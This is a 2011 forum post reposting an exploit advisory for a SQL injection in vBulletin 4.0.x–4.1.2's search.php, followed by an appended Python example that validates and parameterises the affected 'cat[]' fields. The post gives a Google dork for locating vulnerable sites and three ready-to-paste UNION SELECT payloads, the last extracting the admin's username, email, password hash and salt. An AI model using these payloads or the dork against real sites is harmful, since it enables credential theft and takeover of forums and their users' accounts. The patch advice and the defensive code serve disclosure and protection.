BLOG OF H7T_2002


Personal page of H7T_2002++


    vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

    h7t_2002
    --[DEVELOPER]--


    Total posts : 67
    Join date : 01/06/2009
    Age : 33
    From : /dev/null


    Post by h7t_2002 Wed Jun 08, 2011 2:36 pm

    Code:
    ================================================== ==================
    #vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
    ================================================== ==================
    #PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
    ================================================== ==================

    #[+] Discovered By : D4rkB1t
    #[+] Site : NaN
    #[+] support e-mail : d4rkb1t@live.com


    Product: http://www.vbulletin.com
    Version: 4.0.x
    Dork : inurl:"search.php?search_type=1"

    --------------------------
    # ~Vulnerable Codes~ #
    --------------------------
    /vb/search/searchtools.php - line 715;
    /packages/vbforum/search/type/socialgroup.php - line 201:203;

    --------------------------
    # ~Exploit~ #
    --------------------------
    POST data on "Search Multiple Content Types" => "groups"

    &cat[0]=1) UNION SELECT database()#
    &cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
    &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#

    More info: http://j0hnx3r.org/?p=818

    --------------------------
    # ~Advice~ #
    --------------------------
    Vendor already released a patch on vb#4.1.3.
    UPDATE NOW!

    ================================================== ==================
    # 1337day.com [2011-5-21]
    ================================================== ==================
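
An added example, not part of the original post and not vBulletin's own code: a server-side check that accepts only numeric values in the `cat[...]` fields named above and binds them as query parameters instead of concatenating them. It assumes the ids end up in a SQL `IN (...)` list; the function names and the sample request bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Assumption: the search form submits category ids as cat[0], cat[1], ...
CAT_KEY = re.compile(r"cat\[[0-9]*\]")
INT_ID = re.compile(r"[0-9]{1,10}")  # ASCII digits only, bounded length

# Constructed sample request bodies (form-encoded POST data).
BENIGN_BODY = "search_type=1&cat[0]=1&cat[1]=7"
SUSPECT_BODY = "search_type=1&cat[0]=1) UNION SELECT database()#"


def split_cat_params(body):
    """Return (ids, rejected) for every cat[...] field in a form-encoded body.

    ids      -> list of ints that passed the strict integer check
    rejected -> list of (key, raw_value) pairs that must not reach SQL
    """
    ids, rejected = [], []
    for key, value in parse_qsl(body, keep_blank_values=True):
        if not CAT_KEY.fullmatch(key):
            continue  # not a category field, handled elsewhere
        if INT_ID.fullmatch(value):
            ids.append(int(value))
        else:
            rejected.append((key, value))
    return ids, rejected


def build_in_clause(ids):
    """Build 'IN (?, ?, ...)' plus the bound values; nothing is concatenated."""
    if not ids:
        raise ValueError("no category ids to search")
    placeholders = ", ".join("?" for _ in ids)
    return "IN (" + placeholders + ")", tuple(ids)


def handle_search(body):
    """Reject the whole request if any cat[...] value is not an integer."""
    ids, rejected = split_cat_params(body)
    if rejected:
        return {"status": 400, "rejected": rejected}
    clause, params = build_in_clause(ids)
    return {"status": 200, "clause": clause, "params": params}


if __name__ == "__main__":
    print(handle_search(BENIGN_BODY))
    print(handle_search(SUSPECT_BODY))
```

Rejected key/value pairs are worth logging with the client address, since a non-numeric value in these fields does not come from normal use of the form.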
